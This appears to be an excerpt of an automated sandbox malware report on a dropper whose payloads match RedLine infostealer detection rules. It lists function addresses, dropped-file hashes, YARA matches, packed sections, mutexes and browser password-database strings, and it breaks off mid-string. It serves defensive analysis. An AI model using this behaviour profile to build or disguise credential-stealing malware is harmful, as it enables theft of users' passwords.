Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBEC650	9_2_6CBEC650
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBBA7D0	9_2_6CBBA7D0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC10700	9_2_6CC10700
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBA00B0	9_2_6CBA00B0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CB88090	9_2_6CB88090
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC6C0B0	9_2_6CC6C0B0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC5C000	9_2_6CC5C000
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBDE070	9_2_6CBDE070
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC58010	9_2_6CC58010
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CB901E0	9_2_6CB901E0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC06130	9_2_6CC06130
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC74130	9_2_6CC74130
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBF8140	9_2_6CBF8140
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CD162C0	9_2_6CD162C0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC622A0	9_2_6CC622A0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC5E2B0	9_2_6CC5E2B0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC28250	9_2_6CC28250
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC18260	9_2_6CC18260
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC5A210	9_2_6CC5A210
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC68220	9_2_6CC68220
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBEE3B0	9_2_6CBEE3B0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBC23A0	9_2_6CBC23A0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBE43E0	9_2_6CBE43E0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CCAC360	9_2_6CCAC360
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC26370	9_2_6CC26370
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CCD2370	9_2_6CCD2370
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CB92370	9_2_6CB92370
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC02320	9_2_6CC02320
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CB98340	9_2_6CB98340
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CCCDCD0	9_2_6CCCDCD0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC51CE0	9_2_6CC51CE0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBA1C30	9_2_6CBA1C30
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CCB9C40	9_2_6CCB9C40
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CB93C40	9_2_6CB93C40
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC61DC0	9_2_6CC61DC0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CB83D80	9_2_6CB83D80
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CCD9D90	9_2_6CCD9D90
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBF3D00	9_2_6CBF3D00
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBB3EC0	9_2_6CBB3EC0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CD15E60	9_2_6CD15E60
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CCEBE70	9_2_6CCEBE70
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC9DE10	9_2_6CC9DE10
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CCADFC0	9_2_6CCADFC0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CD13FC0	9_2_6CD13FC0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBB1F90	9_2_6CBB1F90
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC3BFF0	9_2_6CC3BFF0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CB85F30	9_2_6CB85F30
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBC5F20	9_2_6CBC5F20
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CCE7F20	9_2_6CCE7F20
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC6F8F0	9_2_6CC6F8F0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CCEB8F0	9_2_6CCEB8F0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CB9D8E0	9_2_6CB9D8E0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBC38E0	9_2_6CBC38E0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBED810	9_2_6CBED810
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC299C0	9_2_6CC299C0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC279F0	9_2_6CC279F0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBA1980	9_2_6CBA1980
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBF59F0	9_2_6CBF59F0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC61990	9_2_6CC61990
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBC99D0	9_2_6CBC99D0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC4D960	9_2_6CC4D960
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CCDF900	9_2_6CCDF900
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC45920	9_2_6CC45920
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CB91AE0	9_2_6CB91AE0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC6DAB0	9_2_6CC6DAB0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CD19A50	9_2_6CD19A50
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBCFA10	9_2_6CBCFA10
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC8DA30	9_2_6CC8DA30
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBE9BA0	9_2_6CBE9BA0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CB81B80	9_2_6CB81B80
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBD7BF0	9_2_6CBD7BF0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC75B90	9_2_6CC75B90
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC59BB0	9_2_6CC59BB0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBDBB20	9_2_6CBDBB20
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC6FB60	9_2_6CC6FB60
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CB914E0	9_2_6CB914E0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CD114A0	9_2_6CD114A0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC1D410	9_2_6CC1D410
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC79430	9_2_6CC79430
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBC9590	9_2_6CBC9590
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC155F0	9_2_6CC155F0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBA5510	9_2_6CBA5510
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBF7500	9_2_6CBF7500
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CCDF510	9_2_6CCDF510
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBC16A0	9_2_6CBC16A0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBF96A0	9_2_6CBF96A0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBB9600	9_2_6CBB9600
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC07610	9_2_6CC07610
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBA9650	9_2_6CBA9650
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBE5640	9_2_6CBE5640
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CCD37C0	9_2_6CCD37C0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC1B7A0	9_2_6CC1B7A0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBB3720	9_2_6CBB3720
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBFD710	9_2_6CBFD710
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC69720	9_2_6CC69720
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC47090	9_2_6CC47090
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC3F050	9_2_6CC3F050
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CBDB020	9_2_6CBDB020
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Code function: 10_2_00855C83	10_2_00855C83
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Code function: 10_2_0085735A	10_2_0085735A
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Code function: 10_2_00898860	10_2_00898860
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Code function: 10_2_00854DE0	10_2_00854DE0
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Code function: 10_2_00854B30	10_2_00854B30

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Code function: String function: 008680C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: String function: 6CBB3620 appears 98 times
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: String function: 6CBB9B10 appears 109 times
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: String function: 6CCC9F30 appears 51 times
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: String function: 6CBEC5E0 appears 33 times

Source: L8ChrKrbqV.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 27.2.ab13ed0cb0.exe.3b0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 27.2.ab13ed0cb0.exe.3b0000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 27.2.ab13ed0cb0.exe.3b0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000001B.00000003.2403419318.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0000001B.00000002.2525835050.00000000003B2000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: ab13ed0cb0.exe PID: 7852, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23

Source: L8ChrKrbqV.exe	Static PE information: Section: ZLIB complexity 0.9983954326923077
Source: L8ChrKrbqV.exe	Static PE information: Section: ztyvjqnb ZLIB complexity 0.9947399593862816
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe.0.dr	Static PE information: Section: cunjkufl ZLIB complexity 0.994684327899108
Source: NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9979670470027248
Source: skotes.exe.10.dr	Static PE information: Section: ZLIB complexity 0.9979670470027248
Source: random[1].exe0.24.dr	Static PE information: Section: ZLIB complexity 0.9985947027439024
Source: random[1].exe0.24.dr	Static PE information: Section: uaasctnp ZLIB complexity 0.9943093119921758
Source: cab7dbccac.exe.24.dr	Static PE information: Section: ZLIB complexity 0.9985947027439024
Source: cab7dbccac.exe.24.dr	Static PE information: Section: uaasctnp ZLIB complexity 0.9943093119921758
Source: random[1].exe1.24.dr	Static PE information: Section: ZLIB complexity 0.9962366615853658
Source: random[1].exe1.24.dr	Static PE information: Section: efrqcofg ZLIB complexity 0.9946268992219612
Source: ab13ed0cb0.exe.24.dr	Static PE information: Section: ZLIB complexity 0.9962366615853658
Source: ab13ed0cb0.exe.24.dr	Static PE information: Section: efrqcofg ZLIB complexity 0.9946268992219612

Source: ab13ed0cb0.exe.24.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[1].exe1.24.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@47/67@17/14

Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe

Code function: 9_2_6CBF0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

9_2_6CBF0300

Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\2GR5MAG6.htm

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2528:120:WilError_03

Source: C:\Users\user\Desktop\L8ChrKrbqV.exe

File created: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\L8ChrKrbqV.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1891697195.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1892112569.000000006CD1F000.00000002.00000001.01000000.0000000D.sdmp, XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1886012071.0000000005CDC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1891697195.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1892112569.000000006CD1F000.00000002.00000001.01000000.0000000D.sdmp, XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1886012071.0000000005CDC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1891697195.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1892112569.000000006CD1F000.00000002.00000001.01000000.0000000D.sdmp, XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1886012071.0000000005CDC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1891697195.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1892112569.000000006CD1F000.00000002.00000001.01000000.0000000D.sdmp, XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1886012071.0000000005CDC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1891697195.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1892112569.000000006CD1F000.00000002.00000001.01000000.0000000D.sdmp, XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1886012071.0000000005CDC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1891697195.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1886012071.0000000005CDC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1891697195.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1892112569.000000006CD1F000.00000002.00000001.01000000.0000000D.sdmp, XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1886012071.0000000005CDC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: L8ChrKrbqV.exe, 00000000.00000003.1300632573.00000000059DB000.00000004.00000800.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1300996607.00000000059BF000.00000004.00000800.00020000.00000000.sdmp, L8ChrKrbqV.exe, 00000000.00000003.1359475187.0000000005A5C000.00000004.00000800.00020000.00000000.sdmp, XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000003.1665314186.0000000005B89000.00000004.00000020.00020000.00000000.sdmp, XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000003.1793658856.0000000005B7D000.00000004.00000020.00020000.00000000.sdmp, cab7dbccac.exe, 0000001A.00000003.2370668458.00000000053F9000.00000004.00000800.00020000.00000000.sdmp, cab7dbccac.exe, 0000001A.00000003.2370893368.00000000053DD000.00000004.00000800.00020000.00000000.sdmp, HCAEHDHDAKJEBGCBKKJE.9.dr, BAECFCAAECBGDGDHIEHJ.9.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value 